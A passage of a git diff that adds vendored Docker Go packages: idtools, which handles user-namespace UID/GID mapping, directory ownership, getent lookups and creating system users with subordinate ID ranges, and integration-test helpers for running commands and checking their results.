modifies +// ownership ONLY of newly created directories to the requested uid/gid. If the +// directories along the path exist, no change of ownership will be performed +func MkdirAllNewAs(path string, mode os.FileMode, ownerUID, ownerGID int) error { + return mkdirAs(path, mode, ownerUID, ownerGID, true, false) +} + +// MkdirAs creates a directory and then modifies ownership to the requested uid/gid. +// If the directory already exists, this function still changes ownership +func MkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int) error { + return mkdirAs(path, mode, ownerUID, ownerGID, false, true) +} + +// GetRootUIDGID retrieves the remapped root uid/gid pair from the set of maps. +// If the maps are empty, then the root uid/gid will default to "real" 0/0 +func GetRootUIDGID(uidMap, gidMap []IDMap) (int, int, error) { + var uid, gid int + + if uidMap != nil { + xUID, err := ToHost(0, uidMap) + if err != nil { + return -1, -1, err + } + uid = xUID + } + if gidMap != nil { + xGID, err := ToHost(0, gidMap) + if err != nil { + return -1, -1, err + } + gid = xGID + } + return uid, gid, nil +} + +// ToContainer takes an id mapping, and uses it to translate a +// host ID to the remapped ID. If no map is provided, then the translation +// assumes a 1-to-1 mapping and returns the passed in id +func ToContainer(hostID int, idMap []IDMap) (int, error) { + if idMap == nil { + return hostID, nil + } + for _, m := range idMap { + if (hostID >= m.HostID) && (hostID <= (m.HostID + m.Size - 1)) { + contID := m.ContainerID + (hostID - m.HostID) + return contID, nil + } + } + return -1, fmt.Errorf("Host ID %d cannot be mapped to a container ID", hostID) +} + +// ToHost takes an id mapping and a remapped ID, and translates the +// ID to the mapped host ID. If no map is provided, then the translation +// assumes a 1-to-1 mapping and returns the passed in id # +func ToHost(contID int, idMap []IDMap) (int, error) { + if idMap == nil { + return contID, nil + } + for _, m := range idMap { + if (contID >= m.ContainerID) && (contID <= (m.ContainerID + m.Size - 1)) { + hostID := m.HostID + (contID - m.ContainerID) + return hostID, nil + } + } + return -1, fmt.Errorf("Container ID %d cannot be mapped to a host ID", contID) +} + +// CreateIDMappings takes a requested user and group name and +// using the data from /etc/sub{uid,gid} ranges, creates the +// proper uid and gid remapping ranges for that user/group pair +func CreateIDMappings(username, groupname string) ([]IDMap, []IDMap, error) { + subuidRanges, err := parseSubuid(username) + if err != nil { + return nil, nil, err + } + subgidRanges, err := parseSubgid(groupname) + if err != nil { + return nil, nil, err + } + if len(subuidRanges) == 0 { + return nil, nil, fmt.Errorf("No subuid ranges found for user %q", username) + } + if len(subgidRanges) == 0 { + return nil, nil, fmt.Errorf("No subgid ranges found for group %q", groupname) + } + + return createIDMap(subuidRanges), createIDMap(subgidRanges), nil +} + +func createIDMap(subidRanges ranges) []IDMap { + idMap := []IDMap{} + + // sort the ranges by lowest ID first + sort.Sort(subidRanges) + containerID := 0 + for _, idrange := range subidRanges { + idMap = append(idMap, IDMap{ + ContainerID: containerID, + HostID: idrange.Start, + Size: idrange.Length, + }) + containerID = containerID + idrange.Length + } + return idMap +} + +func parseSubuid(username string) (ranges, error) { + return parseSubidFile(subuidFileName, username) +} + +func parseSubgid(username string) (ranges, error) { + return parseSubidFile(subgidFileName, username) +} + +// parseSubidFile will read the appropriate file (/etc/subuid or /etc/subgid) +// and return all found ranges for a specified username. If the special value +// "ALL" is supplied for username, then all ranges in the file will be returned +func parseSubidFile(path, username string) (ranges, error) { + var rangeList ranges + + subidFile, err := os.Open(path) + if err != nil { + return rangeList, err + } + defer subidFile.Close() + + s := bufio.NewScanner(subidFile) + for s.Scan() { + if err := s.Err(); err != nil { + return rangeList, err + } + + text := strings.TrimSpace(s.Text()) + if text == "" || strings.HasPrefix(text, "#") { + continue + } + parts := strings.Split(text, ":") + if len(parts) != 3 { + return rangeList, fmt.Errorf("Cannot parse subuid/gid information: Format not correct for %s file", path) + } + if parts[0] == username || username == "ALL" { + startid, err := strconv.Atoi(parts[1]) + if err != nil { + return rangeList, fmt.Errorf("String to int conversion failed during subuid/gid parsing of %s: %v", path, err) + } + length, err := strconv.Atoi(parts[2]) + if err != nil { + return rangeList, fmt.Errorf("String to int conversion failed during subuid/gid parsing of %s: %v", path, err) + } + rangeList = append(rangeList, subIDRange{startid, length}) + } + } + return rangeList, nil +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go new file mode 100644 index 0000000000..f9eb31c3ec --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go @@ -0,0 +1,207 @@ +// +build !windows + +package idtools + +import ( + "bytes" + "fmt" + "io" + "os" + "path/filepath" + "strings" + "sync" + + "github.com/docker/docker/pkg/system" + "github.com/opencontainers/runc/libcontainer/user" +) + +var ( + entOnce sync.Once + getentCmd string +) + +func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chownExisting bool) error { + // make an array containing the original path asked for, plus (for mkAll == true) + // all path components leading up to the complete path that don't exist before we MkdirAll + // so that we can chown all of them properly at the end. If chownExisting is false, we won't + // chown the full directory path if it exists + var paths []string + if _, err := os.Stat(path); err != nil && os.IsNotExist(err) { + paths = []string{path} + } else if err == nil && chownExisting { + if err := os.Chown(path, ownerUID, ownerGID); err != nil { + return err + } + // short-circuit--we were called with an existing directory and chown was requested + return nil + } else if err == nil { + // nothing to do; directory path fully exists already and chown was NOT requested + return nil + } + + if mkAll { + // walk back to "/" looking for directories which do not exist + // and add them to the paths array for chown after creation + dirPath := path + for { + dirPath = filepath.Dir(dirPath) + if dirPath == "/" { + break + } + if _, err := os.Stat(dirPath); err != nil && os.IsNotExist(err) { + paths = append(paths, dirPath) + } + } + if err := system.MkdirAll(path, mode); err != nil && !os.IsExist(err) { + return err + } + } else { + if err := os.Mkdir(path, mode); err != nil && !os.IsExist(err) { + return err + } + } + // even if it existed, we will chown the requested path + any subpaths that + // didn't exist when we called MkdirAll + for _, pathComponent := range paths { + if err := os.Chown(pathComponent, ownerUID, ownerGID); err != nil { + return err + } + } + return nil +} + +// CanAccess takes a valid (existing) directory and a uid, gid pair and determines +// if that uid, gid pair has access (execute bit) to the directory +func CanAccess(path string, uid, gid int) bool { + statInfo, err := system.Stat(path) + if err != nil { + return false + } + fileMode := os.FileMode(statInfo.Mode()) + permBits := fileMode.Perm() + return accessible(statInfo.UID() == uint32(uid), + statInfo.GID() == uint32(gid), permBits) +} + +func accessible(isOwner, isGroup bool, perms os.FileMode) bool { + if isOwner && (perms&0100 == 0100) { + return true + } + if isGroup && (perms&0010 == 0010) { + return true + } + if perms&0001 == 0001 { + return true + } + return false +} + +// LookupUser uses traditional local system files lookup (from libcontainer/user) on a username, +// followed by a call to `getent` for supporting host configured non-files passwd and group dbs +func LookupUser(username string) (user.User, error) { + // first try a local system files lookup using existing capabilities + usr, err := user.LookupUser(username) + if err == nil { + return usr, nil + } + // local files lookup failed; attempt to call `getent` to query configured passwd dbs + usr, err = getentUser(fmt.Sprintf("%s %s", "passwd", username)) + if err != nil { + return user.User{}, err + } + return usr, nil +} + +// LookupUID uses traditional local system files lookup (from libcontainer/user) on a uid, +// followed by a call to `getent` for supporting host configured non-files passwd and group dbs +func LookupUID(uid int) (user.User, error) { + // first try a local system files lookup using existing capabilities + usr, err := user.LookupUid(uid) + if err == nil { + return usr, nil + } + // local files lookup failed; attempt to call `getent` to query configured passwd dbs + return getentUser(fmt.Sprintf("%s %d", "passwd", uid)) +} + +func getentUser(args string) (user.User, error) { + reader, err := callGetent(args) + if err != nil { + return user.User{}, err + } + users, err := user.ParsePasswd(reader) + if err != nil { + return user.User{}, err + } + if len(users) == 0 { + return user.User{}, fmt.Errorf("getent failed to find passwd entry for %q", strings.Split(args, " ")[1]) + } + return users[0], nil +} + +// LookupGroup uses traditional local system files lookup (from libcontainer/user) on a group name, +// followed by a call to `getent` for supporting host configured non-files passwd and group dbs +func LookupGroup(groupname string) (user.Group, error) { + // first try a local system files lookup using existing capabilities + group, err := user.LookupGroup(groupname) + if err == nil { + return group, nil + } + // local files lookup failed; attempt to call `getent` to query configured group dbs + return getentGroup(fmt.Sprintf("%s %s", "group", groupname)) +} + +// LookupGID uses traditional local system files lookup (from libcontainer/user) on a group ID, +// followed by a call to `getent` for supporting host configured non-files passwd and group dbs +func LookupGID(gid int) (user.Group, error) { + // first try a local system files lookup using existing capabilities + group, err := user.LookupGid(gid) + if err == nil { + return group, nil + } + // local files lookup failed; attempt to call `getent` to query configured group dbs + return getentGroup(fmt.Sprintf("%s %d", "group", gid)) +} + +func getentGroup(args string) (user.Group, error) { + reader, err := callGetent(args) + if err != nil { + return user.Group{}, err + } + groups, err := user.ParseGroup(reader) + if err != nil { + return user.Group{}, err + } + if len(groups) == 0 { + return user.Group{}, fmt.Errorf("getent failed to find groups entry for %q", strings.Split(args, " ")[1]) + } + return groups[0], nil +} + +func callGetent(args string) (io.Reader, error) { + entOnce.Do(func() { getentCmd, _ = resolveBinary("getent") }) + // if no `getent` command on host, can't do anything else + if getentCmd == "" { + return nil, fmt.Errorf("") + } + out, err := execCmd(getentCmd, args) + if err != nil { + exitCode, errC := system.GetExitCode(err) + if errC != nil { + return nil, err + } + switch exitCode { + case 1: + return nil, fmt.Errorf("getent reported invalid parameters/database unknown") + case 2: + terms := strings.Split(args, " ") + return nil, fmt.Errorf("getent unable to find entry %q in %s database", terms[1], terms[0]) + case 3: + return nil, fmt.Errorf("getent database doesn't support enumeration") + default: + return nil, err + } + + } + return bytes.NewReader(out), nil +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go new file mode 100644 index 0000000000..540d3079ee --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go @@ -0,0 +1,271 @@ +// +build !windows + +package idtools + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "syscall" + "testing" +) + +type node struct { + uid int + gid int +} + +func TestMkdirAllAs(t *testing.T) { + dirName, err := ioutil.TempDir("", "mkdirall") + if err != nil { + t.Fatalf("Couldn't create temp dir: %v", err) + } + defer os.RemoveAll(dirName) + + testTree := map[string]node{ + "usr": {0, 0}, + "usr/bin": {0, 0}, + "lib": {33, 33}, + "lib/x86_64": {45, 45}, + "lib/x86_64/share": {1, 1}, + } + + if err := buildTree(dirName, testTree); err != nil { + t.Fatal(err) + } + + // test adding a directory to a pre-existing dir; only the new dir is owned by the uid/gid + if err := MkdirAllAs(filepath.Join(dirName, "usr", "share"), 0755, 99, 99); err != nil { + t.Fatal(err) + } + testTree["usr/share"] = node{99, 99} + verifyTree, err := readTree(dirName, "") + if err != nil { + t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } + + // test 2-deep new directories--both should be owned by the uid/gid pair + if err := MkdirAllAs(filepath.Join(dirName, "lib", "some", "other"), 0755, 101, 101); err != nil { + t.Fatal(err) + } + testTree["lib/some"] = node{101, 101} + testTree["lib/some/other"] = node{101, 101} + verifyTree, err = readTree(dirName, "") + if err != nil { + t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } + + // test a directory that already exists; should be chowned, but nothing else + if err := MkdirAllAs(filepath.Join(dirName, "usr"), 0755, 102, 102); err != nil { + t.Fatal(err) + } + testTree["usr"] = node{102, 102} + verifyTree, err = readTree(dirName, "") + if err != nil { + t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } +} + +func TestMkdirAllNewAs(t *testing.T) { + + dirName, err := ioutil.TempDir("", "mkdirnew") + if err != nil { + t.Fatalf("Couldn't create temp dir: %v", err) + } + defer os.RemoveAll(dirName) + + testTree := map[string]node{ + "usr": {0, 0}, + "usr/bin": {0, 0}, + "lib": {33, 33}, + "lib/x86_64": {45, 45}, + "lib/x86_64/share": {1, 1}, + } + + if err := buildTree(dirName, testTree); err != nil { + t.Fatal(err) + } + + // test adding a directory to a pre-existing dir; only the new dir is owned by the uid/gid + if err := MkdirAllNewAs(filepath.Join(dirName, "usr", "share"), 0755, 99, 99); err != nil { + t.Fatal(err) + } + testTree["usr/share"] = node{99, 99} + verifyTree, err := readTree(dirName, "") + if err != nil { + t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } + + // test 2-deep new directories--both should be owned by the uid/gid pair + if err := MkdirAllNewAs(filepath.Join(dirName, "lib", "some", "other"), 0755, 101, 101); err != nil { + t.Fatal(err) + } + testTree["lib/some"] = node{101, 101} + testTree["lib/some/other"] = node{101, 101} + verifyTree, err = readTree(dirName, "") + if err != nil { + t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } + + // test a directory that already exists; should NOT be chowned + if err := MkdirAllNewAs(filepath.Join(dirName, "usr"), 0755, 102, 102); err != nil { + t.Fatal(err) + } + verifyTree, err = readTree(dirName, "") + if err != nil { + t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } +} + +func TestMkdirAs(t *testing.T) { + + dirName, err := ioutil.TempDir("", "mkdir") + if err != nil { + t.Fatalf("Couldn't create temp dir: %v", err) + } + defer os.RemoveAll(dirName) + + testTree := map[string]node{ + "usr": {0, 0}, + } + if err := buildTree(dirName, testTree); err != nil { + t.Fatal(err) + } + + // test a directory that already exists; should just chown to the requested uid/gid + if err := MkdirAs(filepath.Join(dirName, "usr"), 0755, 99, 99); err != nil { + t.Fatal(err) + } + testTree["usr"] = node{99, 99} + verifyTree, err := readTree(dirName, "") + if err != nil { + t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } + + // create a subdir under a dir which doesn't exist--should fail + if err := MkdirAs(filepath.Join(dirName, "usr", "bin", "subdir"), 0755, 102, 102); err == nil { + t.Fatalf("Trying to create a directory with Mkdir where the parent doesn't exist should have failed") + } + + // create a subdir under an existing dir; should only change the ownership of the new subdir + if err := MkdirAs(filepath.Join(dirName, "usr", "bin"), 0755, 102, 102); err != nil { + t.Fatal(err) + } + testTree["usr/bin"] = node{102, 102} + verifyTree, err = readTree(dirName, "") + if err != nil { + t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } +} + +func buildTree(base string, tree map[string]node) error { + for path, node := range tree { + fullPath := filepath.Join(base, path) + if err := os.MkdirAll(fullPath, 0755); err != nil { + return fmt.Errorf("Couldn't create path: %s; error: %v", fullPath, err) + } + if err := os.Chown(fullPath, node.uid, node.gid); err != nil { + return fmt.Errorf("Couldn't chown path: %s; error: %v", fullPath, err) + } + } + return nil +} + +func readTree(base, root string) (map[string]node, error) { + tree := make(map[string]node) + + dirInfos, err := ioutil.ReadDir(base) + if err != nil { + return nil, fmt.Errorf("Couldn't read directory entries for %q: %v", base, err) + } + + for _, info := range dirInfos { + s := &syscall.Stat_t{} + if err := syscall.Stat(filepath.Join(base, info.Name()), s); err != nil { + return nil, fmt.Errorf("Can't stat file %q: %v", filepath.Join(base, info.Name()), err) + } + tree[filepath.Join(root, info.Name())] = node{int(s.Uid), int(s.Gid)} + if info.IsDir() { + // read the subdirectory + subtree, err := readTree(filepath.Join(base, info.Name()), filepath.Join(root, info.Name())) + if err != nil { + return nil, err + } + for path, nodeinfo := range subtree { + tree[path] = nodeinfo + } + } + } + return tree, nil +} + +func compareTrees(left, right map[string]node) error { + if len(left) != len(right) { + return fmt.Errorf("Trees aren't the same size") + } + for path, nodeLeft := range left { + if nodeRight, ok := right[path]; ok { + if nodeRight.uid != nodeLeft.uid || nodeRight.gid != nodeLeft.gid { + // mismatch + return fmt.Errorf("mismatched ownership for %q: expected: %d:%d, got: %d:%d", path, + nodeLeft.uid, nodeLeft.gid, nodeRight.uid, nodeRight.gid) + } + continue + } + return fmt.Errorf("right tree didn't contain path %q", path) + } + return nil +} + +func TestParseSubidFileWithNewlinesAndComments(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "parsesubid") + if err != nil { + t.Fatal(err) + } + fnamePath := filepath.Join(tmpDir, "testsubuid") + fcontent := `tss:100000:65536 +# empty default subuid/subgid file + +dockremap:231072:65536` + if err := ioutil.WriteFile(fnamePath, []byte(fcontent), 0644); err != nil { + t.Fatal(err) + } + ranges, err := parseSubidFile(fnamePath, "dockremap") + if err != nil { + t.Fatal(err) + } + if len(ranges) != 1 { + t.Fatalf("wanted 1 element in ranges, got %d instead", len(ranges)) + } + if ranges[0].Start != 231072 { + t.Fatalf("wanted 231072, got %d instead", ranges[0].Start) + } + if ranges[0].Length != 65536 { + t.Fatalf("wanted 65536, got %d instead", ranges[0].Length) + } +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go new file mode 100644 index 0000000000..49f67e78c1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go @@ -0,0 +1,25 @@ +// +build windows + +package idtools + +import ( + "os" + + "github.com/docker/docker/pkg/system" +) + +// Platforms such as Windows do not support the UID/GID concept. So make this +// just a wrapper around system.MkdirAll. +func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chownExisting bool) error { + if err := system.MkdirAll(path, mode); err != nil && !os.IsExist(err) { + return err + } + return nil +} + +// CanAccess takes a valid (existing) directory and a uid, gid pair and determines +// if that uid, gid pair has access (execute bit) to the directory +// Windows does not require/support this function, so always return true +func CanAccess(path string, uid, gid int) bool { + return true +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go new file mode 100644 index 0000000000..9da7975e2c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go @@ -0,0 +1,164 @@ +package idtools + +import ( + "fmt" + "regexp" + "sort" + "strconv" + "strings" + "sync" +) + +// add a user and/or group to Linux /etc/passwd, /etc/group using standard +// Linux distribution commands: +// adduser --system --shell /bin/false --disabled-login --disabled-password --no-create-home --group +// useradd -r -s /bin/false + +var ( + once sync.Once + userCommand string + + cmdTemplates = map[string]string{ + "adduser": "--system --shell /bin/false --no-create-home --disabled-login --disabled-password --group %s", + "useradd": "-r -s /bin/false %s", + "usermod": "-%s %d-%d %s", + } + + idOutRegexp = regexp.MustCompile(`uid=([0-9]+).*gid=([0-9]+)`) + // default length for a UID/GID subordinate range + defaultRangeLen = 65536 + defaultRangeStart = 100000 + userMod = "usermod" +) + +// AddNamespaceRangesUser takes a username and uses the standard system +// utility to create a system user/group pair used to hold the +// /etc/sub{uid,gid} ranges which will be used for user namespace +// mapping ranges in containers. +func AddNamespaceRangesUser(name string) (int, int, error) { + if err := addUser(name); err != nil { + return -1, -1, fmt.Errorf("Error adding user %q: %v", name, err) + } + + // Query the system for the created uid and gid pair + out, err := execCmd("id", name) + if err != nil { + return -1, -1, fmt.Errorf("Error trying to find uid/gid for new user %q: %v", name, err) + } + matches := idOutRegexp.FindStringSubmatch(strings.TrimSpace(string(out))) + if len(matches) != 3 { + return -1, -1, fmt.Errorf("Can't find uid, gid from `id` output: %q", string(out)) + } + uid, err := strconv.Atoi(matches[1]) + if err != nil { + return -1, -1, fmt.Errorf("Can't convert found uid (%s) to int: %v", matches[1], err) + } + gid, err := strconv.Atoi(matches[2]) + if err != nil { + return -1, -1, fmt.Errorf("Can't convert found gid (%s) to int: %v", matches[2], err) + } + + // Now we need to create the subuid/subgid ranges for our new user/group (system users + // do not get auto-created ranges in subuid/subgid) + + if err := createSubordinateRanges(name); err != nil { + return -1, -1, fmt.Errorf("Couldn't create subordinate ID ranges: %v", err) + } + return uid, gid, nil +} + +func addUser(userName string) error { + once.Do(func() { + // set up which commands are used for adding users/groups dependent on distro + if _, err := resolveBinary("adduser"); err == nil { + userCommand = "adduser" + } else if _, err := resolveBinary("useradd"); err == nil { + userCommand = "useradd" + } + }) + if userCommand == "" { + return fmt.Errorf("Cannot add user; no useradd/adduser binary found") + } + args := fmt.Sprintf(cmdTemplates[userCommand], userName) + out, err := execCmd(userCommand, args) + if err != nil { + return fmt.Errorf("Failed to add user with error: %v; output: %q", err, string(out)) + } + return nil +} + +func createSubordinateRanges(name string) error { + + // first, we should verify that ranges weren't automatically created + // by the distro tooling + ranges, err := parseSubuid(name) + if err != nil { + return fmt.Errorf("Error while looking for subuid ranges for user %q: %v", name, err) + } + if len(ranges) == 0 { + // no UID ranges; let's create one + startID, err := findNextUIDRange() + if err != nil { + return fmt.Errorf("Can't find available subuid range: %v", err) + } + out, err := execCmd(userMod, fmt.Sprintf(cmdTemplates[userMod], "v", startID, startID+defaultRangeLen-1, name)) + if err != nil { + return fmt.Errorf("Unable to add subuid range to user: %q; output: %s, err: %v", name, out, err) + } + } + + ranges, err = parseSubgid(name) + if err != nil { + return fmt.Errorf("Error while looking for subgid ranges for user %q: %v", name, err) + } + if len(ranges) == 0 { + // no GID ranges; let's create one + startID, err := findNextGIDRange() + if err != nil { + return fmt.Errorf("Can't find available subgid range: %v", err) + } + out, err := execCmd(userMod, fmt.Sprintf(cmdTemplates[userMod], "w", startID, startID+defaultRangeLen-1, name)) + if err != nil { + return fmt.Errorf("Unable to add subgid range to user: %q; output: %s, err: %v", name, out, err) + } + } + return nil +} + +func findNextUIDRange() (int, error) { + ranges, err := parseSubuid("ALL") + if err != nil { + return -1, fmt.Errorf("Couldn't parse all ranges in /etc/subuid file: %v", err) + } + sort.Sort(ranges) + return findNextRangeStart(ranges) +} + +func findNextGIDRange() (int, error) { + ranges, err := parseSubgid("ALL") + if err != nil { + return -1, fmt.Errorf("Couldn't parse all ranges in /etc/subgid file: %v", err) + } + sort.Sort(ranges) + return findNextRangeStart(ranges) +} + +func findNextRangeStart(rangeList ranges) (int, error) { + startID := defaultRangeStart + for _, arange := range rangeList { + if wouldOverlap(arange, startID) { + startID = arange.Start + arange.Length + } + } + return startID, nil +} + +func wouldOverlap(arange subIDRange, ID int) bool { + low := ID + high := ID + defaultRangeLen + if (low >= arange.Start && low <= arange.Start+arange.Length) || + (high <= arange.Start+arange.Length && high >= arange.Start) { + return true + } + return false +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go new file mode 100644 index 0000000000..d98b354cbd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go @@ -0,0 +1,12 @@ +// +build !linux + +package idtools + +import "fmt" + +// AddNamespaceRangesUser takes a name and finds an unused uid, gid pair +// and calls the appropriate helper function to add the group and then +// the user to the group in /etc/group and /etc/passwd respectively. +func AddNamespaceRangesUser(name string) (int, int, error) { + return -1, -1, fmt.Errorf("No support for adding users or groups on this OS") +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go b/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go new file mode 100644 index 0000000000..9703ecbd9d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go @@ -0,0 +1,32 @@ +// +build !windows + +package idtools + +import ( + "fmt" + "os/exec" + "path/filepath" + "strings" +) + +func resolveBinary(binname string) (string, error) { + binaryPath, err := exec.LookPath(binname) + if err != nil { + return "", err + } + resolvedPath, err := filepath.EvalSymlinks(binaryPath) + if err != nil { + return "", err + } + //only return no error if the final resolved binary basename + //matches what was searched for + if filepath.Base(resolvedPath) == binname { + return resolvedPath, nil + } + return "", fmt.Errorf("Binary %q does not resolve to a binary of that name in $PATH (%q)", binname, resolvedPath) +} + +func execCmd(cmd, args string) ([]byte, error) { + execCmd := exec.Command(cmd, strings.Split(args, " ")...) + return execCmd.CombinedOutput() +} diff --git a/vendor/github.com/docker/docker/pkg/integration/checker/checker.go b/vendor/github.com/docker/docker/pkg/integration/checker/checker.go new file mode 100644 index 0000000000..d1b703a599 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/integration/checker/checker.go @@ -0,0 +1,46 @@ +// Package checker provides Docker specific implementations of the go-check.Checker interface. +package checker + +import ( + "github.com/go-check/check" + "github.com/vdemeester/shakers" +) + +// As a commodity, we bring all check.Checker variables into the current namespace to avoid having +// to think about check.X versus checker.X. +var ( + DeepEquals = check.DeepEquals + ErrorMatches = check.ErrorMatches + FitsTypeOf = check.FitsTypeOf + HasLen = check.HasLen + Implements = check.Implements + IsNil = check.IsNil + Matches = check.Matches + Not = check.Not + NotNil = check.NotNil + PanicMatches = check.PanicMatches + Panics = check.Panics + + Contains = shakers.Contains + ContainsAny = shakers.ContainsAny + Count = shakers.Count + Equals = shakers.Equals + EqualFold = shakers.EqualFold + False = shakers.False + GreaterOrEqualThan = shakers.GreaterOrEqualThan + GreaterThan = shakers.GreaterThan + HasPrefix = shakers.HasPrefix + HasSuffix = shakers.HasSuffix + Index = shakers.Index + IndexAny = shakers.IndexAny + IsAfter = shakers.IsAfter + IsBefore = shakers.IsBefore + IsBetween = shakers.IsBetween + IsLower = shakers.IsLower + IsUpper = shakers.IsUpper + LessOrEqualThan = shakers.LessOrEqualThan + LessThan = shakers.LessThan + TimeEquals = shakers.TimeEquals + True = shakers.True + TimeIgnore = shakers.TimeIgnore +) diff --git a/vendor/github.com/docker/docker/pkg/integration/cmd/command.go b/vendor/github.com/docker/docker/pkg/integration/cmd/command.go new file mode 100644 index 0000000000..76d04e8df5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/integration/cmd/command.go @@ -0,0 +1,294 @@ +package cmd + +import ( + "bytes" + "fmt" + "io" + "os/exec" + "path/filepath" + "runtime" + "strings" + "sync" + "time" + + "github.com/docker/docker/pkg/system" + "github.com/go-check/check" +) + +type testingT interface { + Fatalf(string, ...interface{}) +} + +const ( + // None is a token to inform Result.Assert that the output should be empty + None string = "" +) + +type lockedBuffer struct { + m sync.RWMutex + buf bytes.Buffer +} + +func (buf *lockedBuffer) Write(b []byte) (int, error) { + buf.m.Lock() + defer buf.m.Unlock() + return buf.buf.Write(b) +} + +func (buf *lockedBuffer) String() string { + buf.m.RLock() + defer buf.m.RUnlock() + return buf.buf.String() +} + +// Result stores the result of running a command +type Result struct { + Cmd *exec.Cmd + ExitCode int + Error error + // Timeout is true if the command was killed because it ran for too long + Timeout bool + outBuffer *lockedBuffer + errBuffer *lockedBuffer +} + +// Assert compares the Result against the Expected struct, and fails the test if +// any of the expcetations are not met. +func (r *Result) Assert(t testingT, exp Expected) { + err := r.Compare(exp) + if err == nil { + return + } + + _, file, line, _ := runtime.Caller(1) + t.Fatalf("at %s:%d\n%s", filepath.Base(file), line, err.Error()) +} + +// Compare returns an formatted error with the command, stdout, stderr, exit +// code, and any failed expectations +func (r *Result) Compare(exp Expected) error { + errors := []string{} + add := func(format string, args ...interface{}) { + errors = append(errors, fmt.Sprintf(format, args...)) + } + + if exp.ExitCode != r.ExitCode { + add("ExitCode was %d expected %d", r.ExitCode, exp.ExitCode) + } + if exp.Timeout != r.Timeout { + if exp.Timeout { + add("Expected command to timeout") + } else { + add("Expected command to finish, but it hit the timeout") + } + } + if !matchOutput(exp.Out, r.Stdout()) { + add("Expected stdout to contain %q", exp.Out) + } + if !matchOutput(exp.Err, r.Stderr()) { + add("Expected stderr to contain %q", exp.Err) + } + switch { + // If a non-zero exit code is expected there is going to be an error. + // Don't require an error message as well as an exit code because the + // error message is going to be "exit status which is not useful + case exp.Error == "" && exp.ExitCode != 0: + case exp.Error == "" && r.Error != nil: + add("Expected no error") + case exp.Error != "" && r.Error == nil: + add("Expected error to contain %q, but there was no error", exp.Error) + case exp.Error != "" && !strings.Contains(r.Error.Error(), exp.Error): + add("Expected error to contain %q", exp.Error) + } + + if len(errors) == 0 { + return nil + } + return fmt.Errorf("%s\nFailures:\n%s\n", r, strings.Join(errors, "\n")) +} + +func matchOutput(expected string, actual string) bool { + switch expected { + case None: + return actual == "" + default: + return strings.Contains(actual, expected) + } +} + +func (r *Result) String() string { + var timeout string + if r.Timeout { + timeout = " (timeout)" + } + + return fmt.Sprintf(` +Command: %s +ExitCode: %d%s, Error: %s +Stdout: %v +Stderr: %v +`, + strings.Join(r.Cmd.Args, " "), + r.ExitCode, + timeout, + r.Error, + r.Stdout(), + r.Stderr()) +} + +// Expected is the expected output from a Command. This struct is compared to a +// Result struct by Result.Assert(). +type Expected struct { + ExitCode int + Timeout bool + Error string + Out string + Err string +} + +// Success is the default expected result +var Success = Expected{} + +// Stdout returns the stdout of the process as a string +func (r *Result) Stdout() string { + return r.outBuffer.String() +} + +// Stderr returns the stderr of the process as a string +func (r *Result) Stderr() string { + return r.errBuffer.String() +} + +// Combined returns the stdout and stderr combined into a single string +func (r *Result) Combined() string { + return r.outBuffer.String() + r.errBuffer.String() +} + +// SetExitError sets Error and ExitCode based on Error +func (r *Result) SetExitError(err error) { + if err == nil { + return + } + r.Error = err + r.ExitCode = system.ProcessExitCode(err) +} + +type matches struct{} + +// Info returns the CheckerInfo +func (m *matches) Info() *check.CheckerInfo { + return &check.CheckerInfo{ + Name: "CommandMatches", + Params: []string{"result", "expected"}, + } +} + +// Check compares a result against the expected +func (m *matches) Check(params []interface{}, names []string) (bool, string) { + result, ok := params[0].(*Result) + if !ok { + return false, fmt.Sprintf("result must be a *Result, not %T", params[0]) + } + expected, ok := params[1].(Expected) + if !ok { + return false, fmt.Sprintf("expected must be an Expected, not %T", params[1]) + } + + err := result.Compare(expected) + if err == nil { + return true, "" + } + return false, err.Error() +} + +// Matches is a gocheck.Checker for comparing a Result against an Expected +var Matches = &matches{} + +// Cmd contains the arguments and options for a process to run as part of a test +// suite. +type Cmd struct { + Command []string + Timeout time.Duration + Stdin io.Reader + Stdout io.Writer + Dir string + Env []string +} + +// RunCmd runs a command and returns a Result +func RunCmd(cmd Cmd) *Result { + result := StartCmd(cmd) + if result.Error != nil { + return result + } + return WaitOnCmd(cmd.Timeout, result) +} + +// RunCommand parses a command line and 